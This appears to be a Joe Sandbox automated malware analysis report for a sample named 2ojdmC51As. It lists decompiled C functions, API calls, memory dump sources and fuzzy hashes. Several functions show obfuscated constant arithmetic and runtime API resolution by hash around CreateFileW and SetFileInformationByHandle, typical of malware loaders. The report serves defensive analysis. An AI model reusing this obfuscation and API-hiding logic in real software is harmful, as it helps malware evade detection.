0x004260bf
0x004260c2
0x004260db
0x004260e0
0x004260e8
0x004260eb
0x004260f2
0x004260f3
0x004260f6
0x004260fd

APIs

GetVersion.KERNEL32(?,?,?,00425FEC), ref: 00426068
GetProcessVersion.KERNELBASE(00000000,?,?,?,00425FEC), ref: 004260A5
LoadCursorA.USER32 ref: 004260D3
LoadCursorA.USER32 ref: 004260DE

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CursorLoadVersion$Process
String ID:
API String ID: 2246821583-0
Opcode ID: 6ae578300c1fd388cde0746a419bc37b446ef5b23384ceea8f5f1ab27520ebf6
Instruction ID: b544fc3fc140862069c0e5c3025fa315675d99968a939774a25cb551b1266f67
Opcode Fuzzy Hash: 6ae578300c1fd388cde0746a419bc37b446ef5b23384ceea8f5f1ab27520ebf6
Instruction Fuzzy Hash: 2C113AB1A047608FD728DF3A989452ABBE5FB48704751493FE18BC6B50D778A441CB98

Uniqueness

Uniqueness Score: -1.00%

Function 02238240, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 183
fileCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E02238240(void* __ebx, void* __ebp) {
				short _v524;
				char _v564;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _v596;
				intOrPtr* _t86;
				intOrPtr* _t88;
				void* _t100;
				void* _t101;
				intOrPtr* _t103;
				intOrPtr* _t106;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				unsigned int _t138;
				void* _t140;
				void* _t141;
				signed int _t142;
				intOrPtr _t144;
				void* _t145;
				void* _t148;

				_t145 = __ebp;
				_t112 = __ebx;
				_v592 = 0xe2e3;
				_v592 = _v592 ^ 0xd0dd7a16;
				_t142 = 0x20540118;
				_v592 = _v592 * 0x3d;
				_v592 = _v592 | 0xc45f2d48;
				_v592 = _v592 + 0xffffa838;
				_v592 = _v592 + 0xde6b;
				_v592 = _v592 ^ 0xf67dff2c;
				_v592 = _v592 + _v592 * 4 << 2;
				_v592 = _v592 ^ 0xf4577600;
				_v584 = 0xc2f;
				_v584 = _v584 << 0xb;
				_v584 = _v584 * 0x17;
				_v584 = _v584 >> 8;
				_v584 = _v584 ^ 0x0008c1c9;
				_v580 = 0xfdf2;
				_v580 = _v580 << 7;
				_v580 = _v580 ^ 0x007ef903;
				_v588 = 0xe94a;
				_v588 = _v588 ^ 0xa24bbed7;
				_v588 = _v588 | 0x3a5f93cf;
				_t113 = _v588;
				_t141 = _v580;
				_v588 = (_v588 - (0x2c9fb4d9 * _t113 >> 0x20) >> 1) + (0x2c9fb4d9 * _t113 >> 0x20) >> 6;
				_v588 = _v588 | 0xa489ddc5;
				_v588 = _v588 + 0xf775;
				_t138 = 0x1b4e81b5 * _v588 >> 0x20 >> 3;
				_v588 = _t138;
				_v588 = _v588 ^ 0x0235bf01;
				while(1) {
					L1:
					_t148 = _t142 - 0x17c5ef14;
					if(_t148 > 0) {
						break;
					}
					if(_t148 == 0) {
						_t86 =  *0x223dfec;
						__eflags = _t86;
						if(_t86 == 0) {
							_t111 = E02233F20(0xbb398380);
							_t138 = 0xd4fa8936;
							_t86 = E02233E80(_t112, _t111, 0xd4fa8936, _t145);
							 *0x223dfec = _t86;
						}
						 *_t86( &_v572);
						_t142 = 0x2295af4;
						continue;
					} else {
						if(_t142 == 0xa7036f) {
							_t88 =  *0x223de58;
							__eflags = _t88;
							if(_t88 == 0) {
								_t110 = E02233F20(0xbb398380);
								_t138 = 0xb1aefb5;
								_t88 = E02233E80(_t112, _t110, 0xb1aefb5, _t145);
								 *0x223de58 = _t88;
							}
							 *_t88(0,  &_v524, 0x104);
							_t142 = 0xfef53a6;
							continue;
						} else {
							if(_t142 == 0x2295af4) {
								_v580 = 0xa8c00;
								_v576 = 0;
								_v596 = E0223B590(_v580, _v576, 0x989680, 0);
								_v592 = _t138;
								_t140 = _v588 - _v564;
								_t144 = _v596;
								asm("sbb ecx, [esp+0x3c]");
								__eflags = _v584 - _v592;
								if(__eflags < 0) {
									goto L24;
								} else {
									if(__eflags > 0) {
										L29:
										return 1;
									} else {
										__eflags = _t140 - _t144;
										if(_t140 < _t144) {
											goto L24;
										} else {
											goto L29;
										}
									}
								}
							} else {
								if(_t142 != 0xfef53a6) {
									L23:
									__eflags = _t142 - 0x2ffd856e;
									if(_t142 != 0x2ffd856e) {
										continue;
									} else {
										goto L24;
									}
								} else {
									if( *0x223dfbc == 0) {
										_t101 = E02233F20(0xbb398380);
										_t138 = 0xc0be2284;
										 *0x223dfbc = E02233E80(_t112, _t101, 0xc0be2284, _t145);
									}
									_t100 = CreateFileW( &_v524, _v592, _v584, 0, _v580, _v588, 0); // executed
									_t141 = _t100;
									if(_t141 == 0xffffffff) {
										L24:
										__eflags = 0;
										return 0;
									} else {
										_t142 = 0x28eddbc7;
										continue;
									}
								}
							}
						}
					}
					L30:
				}
				__eflags = _t142 - 0x20540118;
				if(_t142 == 0x20540118) {
					_t142 = 0xa7036f;
					goto L1;
				} else {
					__eflags = _t142 - 0x28eddbc7;
					if(_t142 == 0x28eddbc7) {
						_t103 =  *0x223e1e4;
						__eflags = _t103;
						if(_t103 == 0) {
							_t109 = E02233F20(0xbb398380);
							_t138 = 0xfddf2477;
							_t103 = E02233E80(_t112, _t109, 0xfddf2477, _t145);
							 *0x223e1e4 = _t103;
						}
						 *_t103(_t141, 0,  &_v564, 0x28);
						asm("sbb esi, esi");
						_t106 =  *0x223dc70;
						_t142 = (_t142 & 0xe7c869a6) + 0x2ffd856e;
						__eflags = _t106;
						if(_t106 == 0) {
							_t108 = E02233F20(0xbb398380);
							_t138 = 0x560d239b;
							_t106 = E02233E80(_t112, _t108, 0x560d239b, _t145);
							 *0x223dc70 = _t106;
						}
						 *_t106(_t141);
					}
					goto L23;
				}
				goto L30;
			}

0x02238240
0x02238240
0x02238246
0x0223824e
0x0223825d
0x02238262
0x02238266
0x0223826e
0x02238276
0x0223827e
0x02238290
0x02238294
0x0223829c
0x022382a4
0x022382ae
0x022382b7
0x022382bc
0x022382c4
0x022382cc
0x022382d1
0x022382d9
0x022382e1
0x022382e9
0x022382f1
0x022382f7
0x02238309
0x0223830d
0x02238315
0x02238323
0x02238326
0x0223832a
0x02238332
0x02238332
0x02238332
0x02238338
0x00000000
0x00000000
0x0223833e
0x022383fc
0x02238401
0x02238403
0x0223840a
0x0223840f
0x02238416
0x0223841b
0x0223841b
0x02238425
0x02238427
0x00000000
0x02238344
0x0223834a
0x022383c0
0x022383c5
0x022383c7
0x022383ce
0x022383d3
0x022383da
0x022383df
0x022383df
0x022383f0
0x022383f2
0x00000000
0x0223834c
0x02238352
0x022384cf
0x022384d7
0x022384f7
0x022384fb
0x02238503
0x02238507
0x0223850b
0x02238513
0x02238515
0x00000000
0x02238517
0x02238517
0x0223851e
0x0223852a
0x02238519
0x02238519
0x0223851b
0x00000000
0x00000000
0x00000000
0x00000000
0x0223851b
0x02238517
0x02238358
0x0223835e
0x022384ac
0x022384ac
0x022384b2
0x00000000
0x00000000
0x00000000
0x00000000
0x02238364
0x0223836c
0x02238373
0x02238378
0x02238386
0x02238386
0x022383a9
0x022383ab
0x022383b0
0x022384b8
0x022384b8
0x022384c2
0x022383b6
0x022383b6
0x00000000
0x022383b6
0x022383b0
0x0223835e
0x02238352
0x0223834a
0x00000000
0x0223833e
0x02238431
0x02238437
0x022384c3
0x00000000
0x0223843d
0x0223843d
0x02238443
0x02238445
0x0223844a
0x0223844c
0x02238453
0x02238458
0x0223845f
0x02238464
0x02238464
0x02238473
0x02238477
0x02238479
0x02238484
0x0223848a
0x0223848c
0x02238493
0x02238498
0x0223849f
0x022384a4
0x022384a4
0x022384aa
0x022384aa
0x00000000
0x02238443
0x00000000

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000,?,?,00000000,2564BE4F), ref: 022383A9

Strings

J, xrefs: 022382D9

Memory Dump Source

Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true

Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: J
API String ID: 823142352-2715717022
Opcode ID: dc04e8415f8b403b2db57900e774afde47804ba0af262eab940fd3d3e61ed8c2
Instruction ID: 046fc3dc4dde37c9fd8800998cf9e95323985028582ccfc22bde7e6b40b044dc
Opcode Fuzzy Hash: dc04e8415f8b403b2db57900e774afde47804ba0af262eab940fd3d3e61ed8c2
Instruction Fuzzy Hash: CE61ADB2A283019BC709DFA8D484A2FB7E6ABC4754F04891DF495DB298D774C9098BD3

Uniqueness

Uniqueness Score: -1.00%

Function 022342F0, Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E022342F0(void* __ebx, long __ecx) {
				intOrPtr* _t1;
				void* _t4;
				void* _t16;
				long _t17;
				void* _t18;

				_t8 = __ebx;
				_t1 =  *0x223dea8;
				_t17 = __ecx;
				if(_t1 == 0) {
					_t1 = E02233E80(__ebx, E02233F20(0xbb398380), 0x97f883e, _t18);
					 *0x223dea8 = _t1;
				}
				_t16 =  *_t1();
				if( *0x223dcec == 0) {
					 *0x223dcec = E02233E80(_t8, E02233F20(0xbb398380), 0xe9233692, _t18);
				}
				_t4 = RtlAllocateHeap(_t16, 8, _t17); // executed
				return _t4;
			}

0x022342f0
0x022342f0
0x022342f6
0x022342fb
0x0223430e
0x02234313
0x02234313
0x0223431a
0x02234323
0x0223433b
0x0223433b
0x02234344
0x02234348

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00000480), ref: 02234344

Memory Dump Source

Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true

Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4ea84e08adada8ab621872a34a5346ba314854720047554f852def73907b6ff2
Instruction ID: 296b42382ff2aefb50094ea54d7991c034f64f022902fbde112176804e9fbc5f
Opcode Fuzzy Hash: 4ea84e08adada8ab621872a34a5346ba314854720047554f852def73907b6ff2
Instruction Fuzzy Hash: B3E065B6B613026BDB15F6F5745866B25EBABC0A8135448A9F401CB348EE748D014BD0

Uniqueness

Uniqueness Score: -1.00%

Function 00409C36, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409C36() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00409BF0); // executed
				 *0x439edc = _t1;
				return _t1;
			}

0x00409c3b
0x00409c41
0x00409c46

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00009BF0), ref: 00409C3B

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: eaecefe91e68a956ecc4aad3851b8f6e6bc4ba172a0f5c73694e1f4e145b78c8
Instruction ID: b3cfb7864018c3ddb187660085869e9baaa6efe3d8831d09aec10079f1b62131
Opcode Fuzzy Hash: eaecefe91e68a956ecc4aad3851b8f6e6bc4ba172a0f5c73694e1f4e145b78c8
Instruction Fuzzy Hash: BCA022B02003808FCB20AF20BC3A0203B30F2003A23000032E000802F2EBF02880EF0C

Uniqueness

Uniqueness Score: -1.00%

Function 0042592B, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0042592B() {
				void* __ecx;
				void* __ebp;
				struct _CRITICAL_SECTION* _t36;
				void* _t37;
				struct _CRITICAL_SECTION* _t42;
				signed char* _t58;
				void* _t61;
				void* _t63;
				void* _t65;
				signed int _t70;
				void* _t71;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;

				_t71 = _t65;
				_t1 = _t71 + 0x1c; // 0x4399c8
				_t36 = _t1;
				 *(_t74 + 0x14) = _t36;
				EnterCriticalSection(_t36);
				_t3 = _t71 + 4; // 0x20
				_t72 =  *_t3;
				_t4 = _t71 + 8; // 0x4
				_t70 =  *_t4;
				if(_t70 >= _t72) {
					L2:
					_t70 = 1;
					if(_t72 <= _t70) {
						L7:
						_t13 = _t71 + 0x10; // 0x6a00e0
						_t37 =  *_t13;
						_t73 = _t72 + 0x20;
						if(_t37 != 0) {
							_t61 = GlobalHandle(_t37);
							GlobalUnlock(_t61);
							_t42 = GlobalReAlloc(_t61, _t73 << 3, 0x2002);
						} else {
							_t42 = GlobalAlloc(0x2002, _t73 << 3); // executed
						}
						 *(_t74 + 0x10) = _t42;
						if(_t42 == 0) {
							_t15 = _t71 + 0x10; // 0x6a00e0
							GlobalLock(GlobalHandle( *_t15));
							_t16 = _t74 + 0x14; // 0x406468
							LeaveCriticalSection( *_t16);
							E0041007F(_t65);
						}
						_t63 = GlobalLock( *(_t74 + 0x10));
						_t18 = _t71 + 4; // 0x20
						E00406330(_t63 +  *_t18 * 8, 0,  *_t18 * 0x1fffffff + _t73 << 3);
						_t74 = _t74 + 0xc;
						 *(_t71 + 0x10) = _t63;
						 *(_t71 + 4) = _t73;
					} else {
						_t10 = _t71 + 0x10; // 0x6a00e0
						_t58 =  *_t10 + 8;
						while(( *_t58 & 0x00000001) != 0) {
							_t70 = _t70 + 1;
							_t58 =  &(_t58[8]);
							if(_t70 < _t72) {
								continue;
							}
							break;
						}
						if(_t70 >= _t72) {
							goto L7;
						}
					}
				} else {
					_t5 = _t71 + 0x10; // 0x6a00e0
					if(( *( *_t5 + _t70 * 8) & 0x00000001) != 0) {
						goto L2;
					}
				}
				_t23 = _t71 + 0xc; // 0x4
				if(_t70 >=  *_t23) {
					_t24 = _t70 + 1; // 0x5
					 *((intOrPtr*)(_t71 + 0xc)) = _t24;
				}
				_t26 = _t71 + 0x10; // 0x6a00e0
				 *( *_t26 + _t70 * 8) =  *( *_t26 + _t70 * 8) | 0x00000001;
				_t34 = _t70 + 1; // 0x5
				 *(_t71 + 8) = _t34;
				LeaveCriticalSection( *(_t74 + 0x10));
				return _t70;
			}

0x0042592f
0x00425932
0x00425932
0x00425936
0x0042593a
0x00425940
0x00425940
0x00425943
0x00425943
0x00425948
0x00425957
0x00425959
0x0042595c
0x00425979
0x00425979
0x00425979
0x0042597c
0x00425982
0x0042599e
0x004259a1
0x004259b3
0x00425984
0x0042598f
0x0042598f
0x004259bf
0x004259c5
0x004259c7
0x004259d1
0x004259d3
0x004259d7
0x004259dd
0x004259dd
0x004259e8
0x004259ea
0x00425a01
0x00425a06
0x00425a09
0x00425a0c
0x0042595e
0x0042595e
0x00425961
0x00425964
0x00425969
0x0042596a
0x0042596f
0x00000000
0x00000000
0x00000000
0x0042596f
0x00425973
0x00000000
0x00000000
0x00425973
0x0042594a
0x0042594a
0x00425951
0x00000000
0x00000000
0x00425951
0x00425a10
0x00425a13
0x00425a15
0x00425a18
0x00425a18
0x00425a1b
0x00425a1e
0x00425a29
0x00425a2c
0x00425a2f
0x00425a3c

APIs

EnterCriticalSection.KERNEL32(004399C8,004397CC,00000000,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 0042593A
GlobalAlloc.KERNELBASE(00002002,00000000,?,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 0042598F
GlobalHandle.KERNEL32 ref: 00425998
GlobalUnlock.KERNEL32(00000000,?,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 004259A1
GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 004259B3
GlobalHandle.KERNEL32 ref: 004259CA
GlobalLock.KERNEL32 ref: 004259D1
LeaveCriticalSection.KERNEL32(hd@,?,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 004259D7
GlobalLock.KERNEL32 ref: 004259E6
LeaveCriticalSection.KERNEL32(?), ref: 00425A2F

Strings

hd@, xrefs: 004259D3

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID: hd@
API String ID: 2667261700-3469257913
Opcode ID: eb85e0a3062991710bc79dfb75425efaf453fe1be3974bf155bbcf5f35719e79
Instruction ID: 9ab521ae17bdcbf38e6808dd3f3d9ead1f2f8e9119152a2daa84f5c479dd3fff
Opcode Fuzzy Hash: eb85e0a3062991710bc79dfb75425efaf453fe1be3974bf155bbcf5f35719e79
Instruction Fuzzy Hash: C83181B1304709DFD7249F28EC89A2BB7E8FB44314B404A6EE892D3661D775F845CB64

Uniqueness

Uniqueness Score: -1.00%

Function 02237EC0, Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 227
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E02237EC0() {
				short _v524;
				struct _SECURITY_ATTRIBUTES* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				intOrPtr _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				void* __ebx;
				void* __ebp;
				void* _t91;
				void* _t93;
				intOrPtr* _t95;
				void* _t97;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t109;
				intOrPtr _t113;
				intOrPtr* _t114;
				void* _t116;
				void* _t117;
				void* _t118;
				void* _t121;
				void* _t122;
				void* _t123;
				char _t131;
				intOrPtr _t136;
				unsigned int _t150;
				void* _t153;
				void* _t160;
				void* _t161;
				signed int* _t162;
				void* _t164;

				_t162 =  &_v596;
				_v592 = 0x7beb;
				_t123 = 0x139d8b99;
				_v592 = _v592 | 0x6fda154b;
				_v592 = _v592 + 0xf6a9;
				_v592 = _v592 << 0x10;
				_v592 = _v592 + 0xffffa540;
				_v592 = _v592 ^ 0x7693a440;
				_v588 = 0xc2f;
				_v588 = _v588 << 0xb;
				_t122 = 0;
				_v588 = _v588 * 0x17;
				_v588 = _v588 >> 8;
				_v588 = _v588 ^ 0x0008c1c9;
				_v584 = 0xfdf2;
				_v584 = _v584 << 7;
				_v584 = _v584 ^ 0x007ef903;
				_v596 = 0xe94a;
				_v596 = _v596 ^ 0xa24bbed7;
				_v596 = _v596 | 0x3a5f93cf;
				_t154 = _v596;
				_t161 = _v584;
				_v596 = (_v596 - (0x2c9fb4d9 * _t154 >> 0x20) >> 1) + (0x2c9fb4d9 * _t154 >> 0x20) >> 6;
				_v596 = _v596 | 0xa489ddc5;
				_v596 = _v596 + 0xf775;
				_t150 = 0x1b4e81b5 * _v596 >> 0x20 >> 3;
				_v596 = _t150;
				_v596 = _v596 ^ 0x0235bf01;
				while(1) {
					L1:
					goto L2;
					do {
						while(1) {
							L2:
							_t164 = _t123 - 0x1e3debbe;
							if(_t164 > 0) {
								break;
							}
							if(_t164 == 0) {
								_t97 = E022334C0(0x223d910);
								_t150 =  *0x223dc60;
								_t160 = _t97;
								if(_t150 == 0) {
									_t150 = E02233E80(_t122, E02233F20(0xe66945e6), 0xcca28b0d, _t161);
									 *0x223dc60 = _t150;
								}
								_t136 =  *0x223e2ec;
								 *_t150( &_v524, 0x104, _t160, _t136 + 0x5c, _t136 + 0x278);
								_t102 =  *0x223dea8;
								_t162 =  &(_t162[5]);
								if(_t102 == 0) {
									_t118 = E02233F20(0xbb398380);
									_t150 = 0x97f883e;
									_t102 = E02233E80(_t122, _t118, 0x97f883e, _t161);
									 *0x223dea8 = _t102;
								}
								_t153 =  *_t102();
								_t104 =  *0x223e1a0;
								if(_t104 == 0) {
									_t117 = E02233F20(0xbb398380);
									_t150 = 0x26c3f343;
									_t104 = E02233E80(_t122, _t117, 0x26c3f343, _t161);
									 *0x223e1a0 = _t104;
								}
								 *_t104(_t153, 0, _t160);
								_t123 = 0x2eb48bb5;
								goto L1;
							} else {
								if(_t123 == 0x390f515) {
									_v580 = 0xa8c00;
									_v576 = 0;
									_v596 = E0223B590(_v580, _v576, 0x989680, 0);
									_v592 = _t150;
									_v588 = _v588 - _v596;
									asm("sbb [esp+0x2c], ecx");
									_t123 = 0x1e3debbe;
									continue;
								} else {
									if(_t123 == 0x74c3147) {
										_t109 =  *0x223dc70;
										if(_t109 == 0) {
											_t109 = E02233E80(_t122, E02233F20(0xbb398380), 0x560d239b, _t161);
											 *0x223dc70 = _t109;
										}
										 *_t109(_t161);
										L34:
										return _t122;
									} else {
										if(_t123 != 0x139d8b99) {
											goto L22;
										} else {
											_t123 = 0x31fe4006;
											continue;
										}
									}
								}
							}
							L35:
						}
						if(_t123 == 0x2eb48bb5) {
							if( *0x223dfbc == 0) {
								_t93 = E02233F20(0xbb398380);
								_t150 = 0xc0be2284;
								 *0x223dfbc = E02233E80(_t122, _t93, 0xc0be2284, _t161);
							}
							_t91 = CreateFileW( &_v524, _v592, _v588, 0, _v584, _v596, 0); // executed
							_t161 = _t91;
							if(_t161 == 0xffffffff) {
								goto L34;
							} else {
								_t123 = 0x3a4d3f65;
								goto L2;
							}
						} else {
							if(_t123 == 0x31fe4006) {
								_t95 =  *0x223dfec;
								if(_t95 == 0) {
									_t121 = E02233F20(0xbb398380);
									_t150 = 0xd4fa8936;
									_t95 = E02233E80(_t122, _t121, 0xd4fa8936, _t161);
									 *0x223dfec = _t95;
								}
								 *_t95( &_v572);
								_t123 = 0x390f515;
								goto L2;
							} else {
								if(_t123 != 0x3a4d3f65) {
									goto L22;
								} else {
									_t113 = _v568;
									_t131 = _v572;
									_v560 = _t113;
									_v552 = _t113;
									_v544 = _t113;
									_v536 = _t113;
									_t114 =  *0x223df54;
									_v564 = _t131;
									_v556 = _t131;
									_v548 = _t131;
									_v540 = _t131;
									_v532 = 0;
									if(_t114 == 0) {
										_t116 = E02233F20(0xbb398380);
										_t150 = 0x3d270e76;
										_t114 = E02233E80(_t122, _t116, 0x3d270e76, _t161);
										 *0x223df54 = _t114;
									}
									 *_t114(_t161, 0,  &_v564, 0x28); // executed
									_t123 = 0x74c3147;
									_t122 =  !=  ? 1 : _t122;
									goto L2;
								}
							}
						}
						goto L35;
						L22:
					} while (_t123 != 0x21420c30);
					return _t122;
					goto L35;
				}
			}

0x02237ec0
0x02237eca
0x02237ed2
0x02237ed7
0x02237edf
0x02237ee7
0x02237eec
0x02237ef4
0x02237efc
0x02237f04
0x02237f0e
0x02237f10
0x02237f19
0x02237f1e
0x02237f26
0x02237f2e
0x02237f33
0x02237f3b
0x02237f43
0x02237f4b
0x02237f53
0x02237f59
0x02237f6b
0x02237f6f
0x02237f77
0x02237f85
0x02237f88
0x02237f8c
0x02237f94
0x02237f94
0x02237f94
0x02237fa0
0x02237fa0
0x02237fa0
0x02237fa0
0x02237fa6
0x00000000
0x00000000
0x02237fac
0x0223801f
0x02238024
0x0223802a
0x0223802e
0x02238046
0x02238048
0x02238048
0x0223804e
0x0223806a
0x0223806c
0x02238071
0x02238076
0x0223807d
0x02238082
0x02238089
0x0223808e
0x0223808e
0x02238095
0x02238097
0x0223809e
0x022380a5
0x022380aa
0x022380b1
0x022380b6
0x022380b6
0x022380bf
0x022380c1
0x00000000
0x02237fae
0x02237fb4
0x02237fd7
0x02237fdf
0x02237ffb
0x02237fff
0x0223800b
0x0223800f
0x02238013
0x00000000
0x02237fb6
0x02237fbc
0x02238200
0x02238207
0x0223821a
0x0223821f
0x0223821f
0x02238225
0x0223822a
0x02238233
0x02237fc2
0x02237fc8
0x00000000
0x02237fce
0x02237fce
0x00000000
0x02237fce
0x02237fc8
0x02237fbc
0x02237fb4
0x00000000
0x02237fac
0x022380d1
0x022381b0
0x022381b7
0x022381bc
0x022381ca
0x022381ca
0x022381ed
0x022381ef
0x022381f4
0x00000000
0x022381f6
0x022381f6
0x00000000
0x022381f6
0x022380d7
0x022380dd
0x02238173
0x0223817a
0x02238181
0x02238186
0x0223818d
0x02238192
0x02238192
0x0223819c
0x0223819e
0x00000000
0x022380e3
0x022380e9
0x00000000
0x022380eb
0x022380eb
0x022380ef
0x022380f3
0x022380f7
0x022380fb
0x022380ff
0x02238103
0x02238108
0x0223810c
0x02238110
0x02238114
0x02238118
0x02238122
0x02238129
0x0223812e
0x02238135
0x0223813a
0x0223813a
0x02238149
0x0223814d
0x02238152
0x00000000
0x02238152
0x022380e9
0x022380dd
0x00000000
0x0223815a
0x0223815a
0x02238172
0x00000000
0x02238172

APIs

SetFileInformationByHandle.KERNELBASE(007EF903,00000000,?,00000028), ref: 02238149
CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000), ref: 022381ED

Strings

{, xrefs: 02237ECA
J, xrefs: 02237F3B
e?M:, xrefs: 022380E3
Ei, xrefs: 02238030
e?M:, xrefs: 022381F6

Memory Dump Source

Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true

Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: File$CreateHandleInformation
String ID: J$e?M:$e?M:$Ei${
API String ID: 3667790775-2299002149
Opcode ID: dc67a909832748e3640bac90cbd2579213ab096e5f993dec6094df8410dae01b
Instruction ID: d57d0373b525ab6045a60ed935b2befa2aef531a9fc61ea6449958a1c718d36e
Opcode Fuzzy Hash: dc67a909832748e3640bac90cbd2579213ab096e5f993dec6094df8410dae01b
Instruction Fuzzy Hash: E381C2B1A183019FC719DFA4A49462BB6E6BBC4748F000D2DF556CB258EB74D9048FD3

Uniqueness

Uniqueness Score: -1.00%

Function 004171BC, Relevance: 9.0, APIs: 6, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004171BC(void* __ecx) {
				int _t6;
				struct HDC__* _t17;
				void* _t18;

				_t18 = __ecx;
				_t6 = GetSystemMetrics(0xb); // executed
				 *((intOrPtr*)(_t18 + 8)) = _t6;
				 *((intOrPtr*)(_t18 + 0xc)) = GetSystemMetrics(0xc);
				if( *((intOrPtr*)(_t18 + 0x68)) == 0) {
					E00426041();
				} else {
					E00426011();
				}
				_t17 = GetDC(0);
				 *((intOrPtr*)(_t18 + 0x18)) = GetDeviceCaps(_t17, 0x58);
				 *((intOrPtr*)(_t18 + 0x1c)) = GetDeviceCaps(_t17, 0x5a);
				return ReleaseDC(0, _t17);
			}

0x004171c5
0x004171c9
0x004171cd
0x004171d6
0x004171d9
0x004171e2
0x004171db
0x004171db
0x004171db
0x004171f5
0x004171ff
0x00417207
0x00417213

APIs

KiUserCallbackDispatcher.NTDLL ref: 004171C9
GetSystemMetrics.USER32 ref: 004171D0
GetDC.USER32(00000000), ref: 004171E9
GetDeviceCaps.GDI32(00000000,00000058), ref: 004171FA
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00417202
